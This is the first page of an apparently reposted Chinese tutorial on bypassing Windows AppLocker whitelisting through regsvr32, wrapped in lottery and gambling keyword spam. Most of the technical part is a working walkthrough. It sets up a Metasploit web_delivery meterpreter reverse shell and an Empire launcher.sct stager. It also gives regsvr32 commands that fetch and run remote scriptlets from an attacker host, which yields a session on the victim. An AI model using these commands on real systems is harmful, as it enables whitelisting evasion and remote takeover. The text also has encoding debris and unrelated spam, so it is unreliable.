手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

通过regsrv32.exe绕过Applocker应用程序白名单的多种方法

来源:本站整理 作者:佚名 时间:2019-04-30 TAG: 我要投稿

在大型组织的安全领域中,AppLocker正在扮演越来越重要的角色。应用AppLocker规则可以显著降低企业的安全风险,AppLocker规则可以应用于目标应用,这些规则也是构成AppLocker策略的基本组件。
AppLocker规则介绍
规则集合(Rule Collection)
AppLocker控制台以规则集合作为组织单元,这些集合包括可执行文件、脚本、Windows安装文件、封装的应用和应用安装包以及DLL文件。这些规则可以让我们轻松区分开不同类型的应用。
规则条件(Rule Condition)
规则条件可以帮助AppLocker识别哪些应用对应哪些规则。三个主要的规则条件分别为应用发布者、路径以及文件哈希。
文件路径条件
以应用在?#20302;?#20013;的路径作为识别依据;
文件发布者条件
以应用的属性或者数字签名作为识别依据;
文件哈希条件
以应用的哈希值作为识别依据;
看似这些强大的规则让黑客攻击无处遁形,但不幸的是,对于防御者来说,除了默认规则以外,AppLocker还涉及到许多自定义配置,而黑客正是利用这些配置作为突破口的。本文将介绍通过 regsrv32.exe绕过Applocker应用程序白名单的多种方法。
Regsvr32介绍
Regsvr32全称是Microsoft Register Server。它是windows的命令行实用工具。虽然regsvr32有时会引起一些莫名其妙的问题,但作为Windows?#20302;?#25991;件,它仍是一个重要的文件。该文件位于C:\Windows的子文件夹中,该文件能?#36824;?#23519;、跟踪和影响其他程序。由于它是.exe格式,所以主要被用于在Windows文件扩展名中注册和注销程序,它的进程可以广泛地协助OLE(对象链接和嵌入),DLL(数据链接库)和OCX(ActiveX控件模块)。上述流程在后台工作,可以通过任务管理器查看。终止,它是微软最受信任的文件之一。
regsvr32工作原理
当你在regsvr32中注册DLL文件时,与regsvr32关联的程序的信息将添加到Windows中。然后访问这些信息,以了解程序数据的位置以及如何与程序数据进行交互。在注册DLL文件时,信息会被添加到目录的中央,以便windows可以使用它。这些文件的整个路径都有可执行代码,由于这些文件,windows可以调用特定的函数。这些文件非常方便,当软件更新时,这些文件会自动调用更新后的版本。简而言之,它有助于避免软件的版本问题。通常,除了注册和注销DLL文件外,通常不使用此文件。
RegSvr32.exe具有以下命令行选项:
语法:Regsvr32 [/s][/u] [/n] [/i[:cmdline]]
· /u:注销服务器;
· /i:调用DllInstall传递一个可选的[cmdline],当它与/u一起使用时,它会调用dll uninstall。
· /n:不要调用DllRegisterServer,?#25628;?#39033;必须与/i一起使用
· / s :沉默,不显示消息框;
要了解更多信息,请访问这里。
Web传递(Web Delivery)
此模块会快速启动一个提供有效载荷的web服务器,所提供的命令将允许?#30053;?#21644;执行有效载荷。它将通过指定的脚本语?#36234;?#37322;器或通过regsvr32.exe的“squiblydoo”来绕过应用程序白名单。该模块的主要目的是当攻击者不得不手动输入命令时,在目标设备上快速建立会话,例如命令注入。
Regsvr32使用“squiblydoo”技术来绕过应用程序白名单,签名的Microsoft二进制文件Regsvr32能够请求.sct文件,然后在其中执行包含的PowerShell命令。两个web请求(即, .sct文件和PowerShell?#30053;?#25110;执行)都可以发生在同一个端口上。PSH(Binary)”会将文件写入磁盘,允许自定义二进制文件被?#30053;?#25110;执行。
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit
一旦使用这些文本开始运?#26032;?#27934;,你将拥有一个为自定义的URL,就可以在受害者电脑的命令提示符中运行该URL。
regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
在命令执行后按回?#23548;?#23601;将进行会话。输入“sysinfo”以获取目标电脑的信息。
PowerShell Empire
Empire是一款类似Metasploit的渗透测试框架,基于python编写,Empire是一个?#30475;?#30340;PowerShell后开发代理,建立在密码安全通信和灵活的架构上。Empire实现了无需powershell.exe即可运行PowerShell代理的功能,从键盘记录器到Mimikatz等快速部署的后期开发模块,以及适应性通信以避开网络检测,所有这些都包含在以可用性为重点的框架中。
在PowerShell Empire方法中,我们必须将.sct tacks与Metasploit配对,但是在这种方法中,我们将使用Empire框架。它完全基于python的PowerShell windows代理,这使得它非常有用。
如下所示,启动Empire框架后,输入listener命令,以检查是否存在反侦查进程。
uselistner http
set Host //192.168.1.109
execute
使用上述命令,你将拥有一个反侦查进程。输入back命令,就可以退出反侦查进程,以便启动PowerShell。
一旦你退出listener命令,就需要使用一个漏洞来创建恶意文件。在Empire中,stage代表?#27426;?#20195;码,它允许我们的恶意代码通过受感染的主机上的代理运行。这意味着要创建一个漏洞,我们将不得不通过usestager。命令如下:
usestager windows/launcher_sct
set listener http
execute
执行命令后,usestager将在/ tmp中创建一个launcher.sct。现在要获得会话,就必须通过输入以下内容来启动python服务器:
python -m SimpleHTTPServer 8080
当服务器启动时,剩下的唯一步骤就是在受害者的电脑中执行我们的恶意软件。此时,就要在命令提示符中输入以下命令:
regsvr / s / n / u /i://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
在上面的命令中,我们使用了端口8080,这是因为我们的python服务器在同一个端口上被激活。
执行上述操作后,你将收到一个会话:

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的,并不代表本站赞同其观点?#25237;?#20854;真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱[email protected],我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类?#35753;?/li>
        • 最近?#30053;?/li>
        购买彩票权威网址
        手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中
        玉皇大帝西游记 完美世界手游策略 疯狂水果试玩 体彩江苏7位数开奖号码 gpk电子看辣椒数 乐乐安徽麻将安卓官网 嫦娥奔月地在哪里 尤文图斯对卡利亚里比分预测 一起来捉妖最强宠物 法兰克福大学山德曼教授